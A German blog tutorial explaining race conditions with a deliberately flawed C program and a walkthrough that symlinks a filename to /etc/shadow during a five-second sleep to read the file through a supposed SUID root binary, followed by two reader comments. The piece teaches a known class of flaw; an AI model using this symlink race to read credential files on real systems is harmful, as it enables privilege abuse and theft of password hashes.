[Tut] Simple Race Conditions

So, auf Wunsch von p0nny hier mal ein Blogeintrag von mir.

Ich dachte, ich mache einfach mal ein kleines Paper zu einfachen Race Conditions,

vielleicht interessiert es ja jemanden…

/***************************
*                            *
*   Simple Race Conditions   *
*                            *
*   written by GregorSamsa   *
* [email protected] *
*                            *
*****************************/

0x01 {
 Ein kleines Vorwort:
 Hier mal ein kleines Paper zum Thema Race Conditions.
 Wieder eines der Paper die geschrieben wurden,
 um Anfängern das Leben zu erleichter ;)

 Naja, nichts besonderes, aber vllt. regt es den ein oder
 anderen zum nachdenken an...
}

0x02 {
 Was sind Race Conditions?
 Race Conditions sind Situationen, in denen es darum geht,
 dass die Programmausführung von einem Programm solange braucht,
 dass der Angreifer oder ein zweites Programm diese Zeit ausnutzen
 kann, um den Ablauf des ersten Programmes zu ändern.

 Ich habe hierfür ein kleines C-Programm geschrieben, dass
 diesen Umstand simuliert.
}

0x03 {
 /** Simple Race Condition - Example **/
 #include <stdio.h>

 int main(int argc, char **argv)
 {
 FILE *f;
 char c;

 if(argc < 2) {
 printf("usage: %s <filename>\n", argv[0]);
 return 1;
 }

 if(strcmp(argv[1], "secretfilename") == 0) {
 printf("filename correct\nreading %s\n", argv[1]);
 }
 else {
 printf("wrong filename\npls w8 4 next try...\n");
 remove(argv[1]);
 sleep(5);
 }

 f = fopen(argv[1], "r");
 if(f == NULL) {
 printf("cannot open file...\nmaybe wrong filename...?\n");
 return 1;
 }

 while(!feof(f)) printf("%c", fgetc(f));

 fclose(f);

 return 0;
 }
}

0x04 {
 Überlegungen:
 Schauen wir uns dieses Programm an:
 Als erstes überprüft es den Dateinamen.
 Wir gehen einfach mal davon aus, dass wir
 "secretfilename" nicht aus dem Speicher lesen
 können. Das könnte ja auch eine sha-1 Prüfsumme
 des Dateinamens sein ;)

 Wenn der Dateiname nicht richtig ist, wird die Datei
 gelöscht und es werden 5 Sekunden gewartet.

 Später wird versucht die Datei zu öffnen und zu lesen.
 Wenn der falsche Dateiname eingegeben wurde,
 ist die Datei gelöscht und kann nicht gelesen werden...
 Oder doch...?
}

0x05 {
 Angriff:
 Da wir secretfilename nicht wissen, probieren wir
 einfach mal so, das Programm zu starten:

 [[email protected] ~]$ ./rc
 usage: ./rc <filename>
 [[email protected] ~]$ ./rc test
 wrong filename
 pls w8 4 next try...
 <5 sek warten>
 cannot open file...
 maybe wrong filename...?

 Die Angriffsmöglichkeit besteht in der Wartezeit
 von 5 Sekunden.
 Die Datei wird erst gelöscht, _danach_ wird gewartet
 und dann versucht die Datei zu öffnen.
 Daher haben wir ganz locker Zeit, in diesen 5 Sekunden
 die Datei neu zu erstellen, damit die Ausgelesen wird:
 (In dem Beispiel gehen wir davon aus, dass wir ein
 SUID root Programm haben und /etc/shadow lesen wollen)

 [[email protected] ~]$ ./rc test &    # im Hintergrund starten
 [1] 1337
 [[email protected] ~]$ wrong filename
 pls w8 4 next try

 [[email protected] ~]$ ln -s /etc/shadow test    # während der 5 Sekunden eine Datei anlegen,
die auf /etc/shadow verweist
 [[email protected] ~]$ <inhalt von /etc/shadow>
 [1]+ Fertig            ./rc test
 [[email protected] ~]$

 Ganz einfach, oder? :P
 Selbst wenn "test" besteht, wird diese Datei gelöscht,
 da der Dateiname falsch ist.
 Allerdings wird erst _danach_ 5 sek. gewartet,
 und wir erstellen in der Zeit eine Verknüpfung zu /etc/shadow,
 die dann von dem Programm ausgelesen wird. Easy, aren't it?
}

0x06 {
 Schlusswort:
 Das war kein Übermäßiges Tut und in ~45 min. geschrieben.
 Aber vllt. hilft es euch, Designfehler bei Programmabläufen
 zu verstehen und auszunutzen.

 Wer noch Fragen hat findet mich da:
 [email protected]
 irc.freenode.net #back2hack  http://back2hack.cc/
 irc.ircdotnet.net #free-hack  http://free-hack.com/
}

0x07 {
 oh shit, da greetz section... but meh like mah
 1337 friendz so meh hav 2 greetz them here!!!111
 J0hn.X3r - 4 u ;)
 BlackBerry - meh like u :-*
 h0yt3r - caaatz meow <3333
 Invisibility, Cheese, 0x30, aKiller - only: <3
 OpCodez - drugs r bad, but u r cool :P
 ...and kazuya, RedTiger, soulstoned, gesocks and teh
 other user from #back2hack and #free-hack i like u
}

/** n0p **/

2 Replies to “[Tut] Simple Race Conditions”

  1. Ich möchte nicht unhöflich sein… aber wenn du die /etc/shadow dadurch ausgeben kannst… dann würde ich mal deine CHMOD anschauen 😉

  2. War nur ein kleines Beispiel, funzt nich wirklich, war nur so als “PoC” wie das aussehen könnte xD

Leave a Reply

Your email address will not be published.